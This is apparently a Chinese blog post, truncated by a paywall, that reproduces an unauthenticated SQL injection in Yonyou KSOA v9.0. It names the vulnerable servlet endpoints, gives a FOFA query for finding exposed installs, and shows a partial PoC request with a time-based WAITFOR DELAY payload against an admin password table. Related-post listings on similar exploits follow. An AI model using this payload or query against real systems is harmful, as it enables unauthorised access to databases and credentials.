用友时空KSOA SQL注入漏洞复现

已于 2023-08-16 08:50:03 修改
阅读量2.4k 收藏 2
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
于 2023-08-13 22:12:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/132265884
版权

0x01 产品简介

   用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。 

0x02 漏洞概述

   用友时空KSOA /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet接口和/servlet/imagefield接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

0x03 影响范围

用友时空 KSOA v9.0

0x04 复现环境

FOFA:app="用友-时空KSOA"

35b28f7d95624f3e802c0e966a396b88.png 0x05 漏洞复现

PoC-1

GET /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1%27;WAITFOR%20DELAY%20%270:0:10%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko)
Accept-Enco
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
用友时空KSOA存在sql注入漏洞 附POC
nnn2188185的博客
09-24 397
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,该产品common/dept.jsp接口存在SQL注入漏洞
SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1194
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
注入之漏洞
zkaqlaoniao的博客
10-16 159
KSOA可以通过不同产品的组合,帮助流通领域企业实现“交易自动化、管理信息化、决策智能化、商务电子化”的目标,满足企业决策层、管理层、操作层不用应用者的需求。用友时空 KSOA 软件存在存在sql注入漏洞,可利用该漏洞获取系统敏感信息。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。解密81dc9bdb52d04dc20036dbd8313ed055(MD5值)POC内的1234可自定义内容。
用友-时空KSOA QueryService sql注入漏洞复现_笔记
m0_50488257的博客
04-26 257
用友-时空KSOA;SQL SERVER ;sql 注入;漏洞复现
用友时空KSOA、CCERP sql注入漏洞复现
09-25 361
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。
SQL注入漏洞修复方案及代码审计
fengxioabai的博客
03-18 1054
⼀个成功的SQL注⼊攻击可以从 数据库中获取敏感 数据、修改数据库数据(插⼊/更新/删除)、执⾏数据库管理操作 (如关闭数据库管理系统)、恢 复存在于数据库⽂件系统中的指定⽂件 内容,在某些情况下能对操作系统发布命令。由于⽤户的输⼊,也是SQL语句的⼀部分,所以 攻击者可以利⽤这部分可以控制的内容,注⼊⾃⼰定义的语句,改变SQL语句 执⾏逻辑,让数据库执⾏任意⾃⼰需要 的指令。通过控制部分SQL语句,攻击者可以查询数据库中任何⾃⼰需要的数据,利⽤数据库的⼀ 些特性,可以直接 获取数据库服务器的系统权限。
用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
0xSec
06-29 1万+
用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器
用友时空ksoa仓储系统.doc
10-03
用友时空 KSOA 仓储系统拣货功能操作说明 用友时空 KSOA 仓储系统是基于某批发配送企业的仓库自动化管理系统,旨在实现客户订单自动分解到各楼层,并由拣货人员自助索取拣货单。为了实现这个功能,系统需要进行多个...
用友时空KSOA仓储系统.doc
10-03
用友时空KSOA仓储系统拣货功能操作说明 用友时空KSOA仓储系统是一种智能化的仓储管理系统,旨在提高仓储管理效率和准确性。在这个系统中,拣货功能是一个核心模块,旨在实现自动化的拣货过程。下面是对用友时空KSOA...
用友时空密码查看器
02-17
首先,我们来了解一下用友时空KSOA系统。KSOA即Kingdee Service Oriented Architecture,是用友公司推出的一种基于服务导向架构的企业应用平台。它集成了业务流程、信息共享、协同工作等功能,旨在提高企业的运营...
DVWA-sql注入漏洞复现
qq_68238790的博客
12-04 198
SQL注入漏洞Web层面最高位的漏洞之一。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。当应用程序使用输入内容来构造动态sql语句以访问数据库,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生sql注入
世纪信通管理系统 多处 SQL注入漏洞复现
0xSec
12-09 1394
世纪信通管理系统LoginForm2.aspx、initLogin.ashx 等接口处存在SQL注入漏洞,未经身份验证的攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
DataEase SQL注入漏洞 (CVE-2022-34114)
weixin_68999845的博客
07-21 901
CVE-2022-34114漏洞搭建及复现
用友时空KSOA UploadImage任意文件上传漏洞
Keepb1ue的博客
12-24 1921
用友时空 KSOA 是根据流通企业前沿的IT需求推出的统的IT基础架构,它可以让流通企业各个期建立的 IT 系统之间彼此轻松对话。由于用友时空设备开放了文件上传功能,但未鉴权且上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到服务器,再利用该漏洞获取权限并执行任意命令。2.设置内容检测机制和白名单上传机制。1.通过防火墙等安全设备限制访问策略。3.如非必要,禁止公网访问该系统。app=“用友-时空KSOA
vulhub靶场sql注入漏洞复现
赵花花08042的博客
12-13 3219
Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234) https://github.com/vulhub/vulhub/blob/master/django/CVE-2019-14234/README.zh-cn.md https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483996&idx=1&sn=4254dc0a54003cccb29dd42935f8ccea.
用友NC的一些漏洞复现
热门推荐
yzl_007的博客
12-15 1万+
用友NC的一些漏洞复现 一、BeanShell Test Servlet命令执行 漏洞介绍:用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。 影响范围:NC 6.5版本 复现过程: 访问对应网站后界面如下: 漏洞url就是:ip地址:端口/servlet/~ic/bsh.servlet.BshServlet 后续还可以写shell进去,但是这里不
漏洞复现用友NC-任意文件上传-uploadFile
知黑而守白
05-05 182
用友NC是北京用友软件股份有限公司(简称“用友”)开发的一款企业管理软件,支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域,涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统,提供基于云计算、SaaS模式、本地部署等多种部署方式,广泛应用于国内外众多中小型企业和大型企业用友NC允许攻击者通过uploadFile接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。
用友GRP A++Cloud 政府财务云 任意文件读取漏洞复现(XVE-2024-10490)
最新发布
0xSec
05-07 650
用友GRP A++Cloud 政府财务云 /ma/emp/maEmp/download接口存在任意文件读取漏洞,未经身份攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
用友时空KSOA ImageUpload任意文件上传漏洞复现+利用
0xSec
04-04 2189
用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值